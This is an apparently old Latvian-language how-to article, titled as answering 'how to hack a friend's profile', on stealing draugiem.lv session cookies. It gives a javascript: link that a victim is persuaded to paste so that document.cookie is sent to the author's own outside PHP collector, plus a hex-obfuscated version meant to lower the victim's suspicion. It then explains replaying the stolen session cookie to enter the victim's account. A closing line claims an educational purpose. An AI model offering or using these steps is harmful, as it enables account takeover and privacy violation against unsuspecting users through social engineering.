Šajā rakstā es mēģināšu atbildēt uz vienu no lietotāju biežāk uzdotajiem jautājumiem: “Kā uzlauzt drauga profilu?”.
Ir vairāki veidi kā to izdarīt, es izskaidrošu vienkāršāko no tiem – cepumu zagšanu. Nevajag domāt, ka būs jāiet pie drauga zagt cepumi. Dotajā gadījumā cepumi ir domāti [i]cookies[/i] – sīkfaili, kurus izmanto tavs interneta pārlūks. Cepumus uz tava datora izveido konkrēta web lapa, lai atvieglotu mums dzīvi. Šajos sīkfailos glabājas dažāda informācija, kuru izmanto attiecīgā web lapa, piemēram, autorizācijas dati (md5 hash, sessijas id), informācija par lietotāju (valoda, interneta pārlūks) u.c. Tu droši vien būsi pamanījis, ka izejot no draugiem.lv (ar krustiņu labajā augšējā stūrī, nevis spiežot sarkano uzrakstu “Iziet”) un pēc tam ieejot vēlreiz tev nav jāievada e-pasts un parole. Kāpēc? Pateicoties [i]cookies[/i]! Taču, ja tu būtu uzspiedis “Iziet”, tad portāls draugiem.lv izdzēstu sīkdatnes, un tu vairs nevarētu ieiet bez autorizācijas.
Kur meklēt [i]cookies[/i]? Cepumu atrašanās vieta ir atkarīga no tavas pārlūkprogrammas. Ja tu lieto Internet Explorer, tad savus [i]cookies[/i] vari meklēt šeit: “C:\Documents and Settings\username\Cookies”, bet ja tev ir Mozilla Firefox, tad ej uz šejieni: “C:\Documents and Settings\username\Application Data\Mozilla\Firefox\Profiles\qw3rty.default\cookies.txt”. Firefox lietotājiem ir iespēja apskatīt savas sīkdatnes pašā pārlūkā. Lai to izdarītu spied uz Tools -> Options -> Privacy -> Cookies -> View Cookies. Tur būs visa informācija par taviem cepumiem. Taču Internet Explorer`am un Firefox`am ir viens trūkums – cepumus nevar rediģēt tieši pārlūkā, vajag meklēt cookies failus un taisīt visu ar rokām. Tieši tāpēc es piedāvāju lietot interneta pārlūku Opera – jaunākā versija (uz doto brīdi 8.02) ir pieejama Operas web lapā http://www.opera.com. Kāpēc tieši Opera? Tāpēc, ka Operā ir iespēja rediģēt cepumus pašā pārlūkā. Ej uz Tools -> Advanced -> Cookies, tur būs redzamas visas web lapas, kas ir atstājušas uz tava datora sīkdatnes. Lai mainītu cepumu vērtības spied uz vajadzīgās web lapas adresi un izvēlies cepuma nosaukumu, kura vērtību gribi izmainīt. Tad spied uz Edit un maini ko vien gribi.
Atver interneta pārlūku Opera un ieej draugos – www.draugiem.lv. Ieraksti savu e-pastu, paroli un autorizējies. Kad esi iegājis, tad vari iziet no pārlūka Opera (neklikšķini uz sarkanā uzraksta “Iziet”, bet spied krustiņu vai taustiņu kombināciju Ctrl + Q). Ja viss ir gājis gludi, tad uz tava datora tagad ir draugiem.lv cookies faili. Pārliecināties par to vari aizejot uz Tools -> Advanced -> Cookies. Atrodi web lapu sarakstā draugiem.lv un uzpied uz tā. Tur ir četri cepumi ar sekojošiem nosaukumiem: fr_xxxxxx, lang, session, sex. Katram ir arī sava vērtība. Manas vērtības ir: fr_xxxxxx=yyy lang=1, session=1610574435%7C169572, sex=1. Ja uzmanīgi lasīji, tad droši vien saprati, ka par autorizāciju atbild cepums ar nosaukumu [i]session[/i]. Tātad teorētiski, iegūstot kāda cita cilvēka cepumus, mēs varam autorizēties ar šī cilvēka cepumiem un nokļūt viņa profilā. Bet kā lai iegūst svešus cepumus? Tu taču neprasīsi, lai tavs draugs tev pārsūta savus cepumus, jo, pirmkārt, iespējams, ka viņam nav ne jausmas, kas ir cepumi, otrkārt, ja viņš zin, kas ir cepumi, tad viņam tas liksies pārāk aizdomīgi. Tas nozīmē, ka drauga cepumi mums jāiegūst pašam draugam nezinot. Kā to izdarīt? Lasi tālāk!
Pārējam pie praktiskās daļas. Ja esi kaut nedaudz pazīstams ar PHP un JavaScript, tad tas tev palīdzēs saprast tālāk rakstīto. Lai drauga cepumi nonāktu mūsu rokās, tev vajadzēs aizsūtīt draugam speciāli noformētu linku, kas viņam būs jāieraksta pārlūka adreses laukā. Pats links izskatās šādi: [q]javascript:location=’http://asais.eclub.lv/x.php?’+document.cookie;[/q]
Paskaidrošu, kas ko nozīmē. Vārds “javascript” norāda uz to, ka tālāk rakstītais ir JavaScript kods. Location JavaScript valodā nozīmē adresi, kur tu atrodies. document.cookie ir nekas cits kā konkrētās lapas cepumi. Lai savāktu upura draugiem.lv cepumus, viņam šis links ir jāieraksta savā pārlūkā atrodoties draugos. Tas URL norāda uz manu PHP skriptu, kurš ir nepieciešams, lai savāktu drauga cepumus. PHP skripta kods: [q][/q]
Kad draugs būs ierakstījis savā pārlūkā javascript linku, šis vienkāršais skripts saglabās informāciju par draugu un viņa cepumus failā data.dat (http://asais.eclub.lv/data.dat). Tev atliks tikai nomainīt savus cepumus uz iegūtajiem drauga cepumiem, un tu varēsi ieiet drauga profilā. Lai to izdarītu autorizējies draugos, nomaini savas cepumu vērtības uz iegūtajām un nospied F5 (refresh). Ja visu būsi izdarījis bez kļūdām, tad tavā priekšā būs drauga profils, ar kuru tu vari darīt visu ko vien gribi! Protams, ne visi ir lētticīgi, un ne visi darīs visu, ko tu viņiem liksi. Tie, kas zin kas ir [i]cookies[/i], sapratīs, ka tu tos gribi iegūt un tev var nekas nesanākt. Taču mēs varam mazliet samainīt javascript kodu:
[q]javascript:location=’http://asais.eclub.lv/x.php?’+document.%63%6f%6f%6b%69%65;[/q]
Atšķirība ir tāda, ka mēs samainījām vārdu [i]cookie[/i] uz HEX simboliem, kas nozīmē to pašu. Tagad upurim būs mazāk aizdomu un visam vajadzētu iet gludi!
Neaizmirsti, ka upurim jāatrodas draugiem.lv web lapā, lai [i]cookies[/i] nonāktu pie tevis!
Vari papildināt php skriptu un izvietot to kādā hostingā, taču neaizmirsti samainīt visas adreses uz savējām!
[i]Šis raksts ir rakstīts izglītošanās nolūkos, lai varētu saprast, kas var notikt, ieejot nezināmā web lapā.[/i]